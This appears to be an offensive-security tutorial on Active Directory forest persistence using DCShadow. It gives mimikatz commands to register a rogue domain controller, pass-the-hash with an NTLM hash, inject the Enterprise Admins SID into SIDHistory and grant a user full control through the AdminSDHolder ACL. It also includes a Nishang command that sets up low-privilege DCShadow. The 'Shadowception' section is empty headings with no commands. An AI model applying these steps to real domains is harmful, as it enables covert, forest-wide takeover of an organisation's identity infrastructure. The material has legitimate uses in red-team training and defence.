Forest Persistence
We are going to discuss some ways to do a persistence in a forest root.
DCShadow¶
DCShadow temporaly registers a new DC in the target domain and uses it to push attributes like SID History, SPNs and more over on the specified object without leaving the cange logs for modified object.
The new domain controller is registered by modifying the configuration container, SPNs of an exisiting computer object and couple of RPC services.
Due to the attributes are changed from a domain dontroller, there are no change logs on the actual DC for the target object.
By default, domain administrative privileges are required to use DCShadow.
To execute this persistence we need to use two isntances of mimikatz. The first one starts RPC servers with SYSTEM privileges and specify attributes to be modified:
- mimikatz.exe
!+
!processtoken
lsadump::dcshadow /object:root1user /attribute:Description /value="Hello from DCShadow"
privilege::debug
sekurlsa::pth /userAdministrator /domain:corp.local /ntlm:71d04f9d50ceb1f64de7a09f23e6dc4c /impersonate
lsadump::dcshadow /push
Note: DCShadow can be used with minimal permissions by modifyng ACLs,
Nishanghas a script to set this permissions to a user.
Set-DCShadowPermissions -FakeDC machine-user01 -SAMAccountName root1user -Username user01 -Verbose
Set Primary Group ID to Enterprise Admin¶
Now that we have been discovered how to overwrite attributes of users, we can change the group id of a user to the id of the enterprise administrators or domain admins.
Note: This makes noise, because every one who looks
net group "Enterpise Admins" /domainwill see that the user user01 is a member.
Change SIDHistory of a user¶
We can modify the SIDHistory of a user with SID of Enterprise Admins group in order to obtain full control of the forest.
lsadump::dcshadow /object:user /attribute:SIDHistory /value:S-1-5-21-280534878-1496970234-700767426-519
Modify ntSecurityDescriptor for AdminSDHolder¶
We can modify the ntSecurityDescriptor for AdminSDHolder to add full control for a user.
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=AdminSDHolder,CN=System,DC=corp,DC=local")).psbase.ObjectSecurity.sddl
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=corp,DC=local /attribute:ntSecurityDescriptor /value:<MODIFIED ACL>
Modified ACL:
ORIGINAL ACL + FULL CONTROL FOR OUR USER
....(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;S-1-5-21-560323961-2315414123-15432421423-1323)
Note: We just need to add our SID to the SY/BA/DA ACE result. To see the SID we can use:
Get-NetUser user01
Shadowception¶
We can even run DCShadow from DCShadow. To do that task we will add the following ACLs:
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=corp,DC=local")).psbase.ObjectSecurity.sddl
Note We can use
/stackto stack multiple ACL.
Domain Object¶
- List ACL:
- Append the following ACE:
- Stack the ACL
Attacker Computer Object¶
- List ACL:
- Append the following ACE:
- Stack the ACL
Target User Object¶
- List ACL:
- Append the following ACE:
- Stack the ACL
Sites Configuration Object¶
- List ACL:
- Append the following ACE:
- Stack the ACL
Finally we just start the server:
And on the other session with DA privileges: